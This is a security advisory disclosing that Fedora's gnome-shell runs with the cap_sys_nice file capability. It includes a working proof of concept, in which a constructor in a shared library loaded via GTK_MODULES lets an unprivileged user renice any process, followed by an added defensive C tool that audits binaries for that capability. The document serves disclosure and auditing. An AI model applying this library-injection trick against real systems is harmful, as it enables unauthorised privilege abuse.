Fedora / Gnome fscaps Issue

2021.06.24
Credit: Tavis Ormandy
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

fedora: gnome not using fscaps safely

I happened to notice a minor issue while working on a tool I'm writing. I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:

    $ rpm -qf /bin/gnome-shell
    gnome-shell-3.38.4-1.fc33.x86_64
    $ getcap /bin/gnome-shell
    /bin/gnome-shell cap_sys_nice=ep

This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0:

    $ ps -heo nice -q 495980
    0

I don't have permission to raise that:

    $ renice -n -20 495980
    renice: failed to set priority for 495980 (process ID): Permission denied

But it doesn't matter, I can just make gnome do it:

    $ cat prio.c
    #include <unistd.h>
    #include <sys/time.h>
    #include <sys/resource.h>

    void __attribute__((constructor)) init()
    {
        setpriority(PRIO_PROCESS, 495980, -20);
        _exit(0);
    }
    $ gcc -fPIC -shared -o prio.so prio.c
    $ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes

And if I look at the priority now...

    $ ps -heo nice -q 495980
    -20

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is YYYY-MM-DD. Disclosure at an earlier date is possible if agreed upon by all parties.

Found by: taviso@google.com
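For auditing which binaries are in the same state as /bin/gnome-shell in the report, the following added example (not part of the original report) decodes the security.capability extended attribute that getcap reads and reports whether a file grants cap_sys_nice at exec. The function names and the sample bytes are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/xattr.h>

/* security.capability xattr layout (struct vfs_cap_data): le32 magic_etc, then
 * le32 {permitted, inheritable} pairs: one in revision 1, two in revisions 2-3. */
#define FLAG_EFF 0x00000001u /* VFS_CAP_FLAGS_EFFECTIVE, the "e" in "=ep" */
#define CAP_NICE 23          /* CAP_SYS_NICE */

struct fscap { uint64_t permitted, inheritable; int effective; };

/* Constructed sample: the 20-byte revision 2 value for cap_sys_nice=ep. */
const unsigned char SAMPLE_NICE_EP[20] = { 0x01, 0, 0, 0x02, 0, 0, 0x80, 0 };

static uint32_t le32(const unsigned char *p) {
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode a raw xattr value; returns 0 on success, -1 if malformed. */
int fscap_decode(const unsigned char *b, size_t n, struct fscap *out) {
    if (n < 12) return -1;
    uint32_t magic = le32(b), rev = magic >> 24;
    if (rev < 1 || rev > 3 || (rev > 1 && n < 20)) return -1;
    out->permitted = le32(b + 4);
    out->inheritable = le32(b + 8);
    if (rev > 1) {
        out->permitted |= (uint64_t)le32(b + 12) << 32;
        out->inheritable |= (uint64_t)le32(b + 16) << 32;
    }
    out->effective = (magic & FLAG_EFF) != 0;
    return 0;
}

/* Nonzero when exec'ing the file makes `cap` effective for any caller
 * (still limited by the caller's bounding set). */
int fscap_grants(const struct fscap *c, int cap) {
    return c->effective && ((c->permitted >> cap) & 1);
}

int main(int argc, char **argv) {
    unsigned char buf[64];
    struct fscap c;
    for (int i = 1; i < argc; i++) {  /* files without the xattr are skipped */
        ssize_t n = getxattr(argv[i], "security.capability", buf, sizeof buf);
        if (n < 0 || fscap_decode(buf, (size_t)n, &c) != 0) continue;
        printf("%s permitted=%#llx effective=%d sys_nice=%d\n", argv[i],
               (unsigned long long)c.permitted, c.effective, fscap_grants(&c, CAP_NICE));
    }
    return 0;
}
```

Pass it the paths to check as arguments; a line with effective=1 marks a binary whose capabilities are active for every user who runs it.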

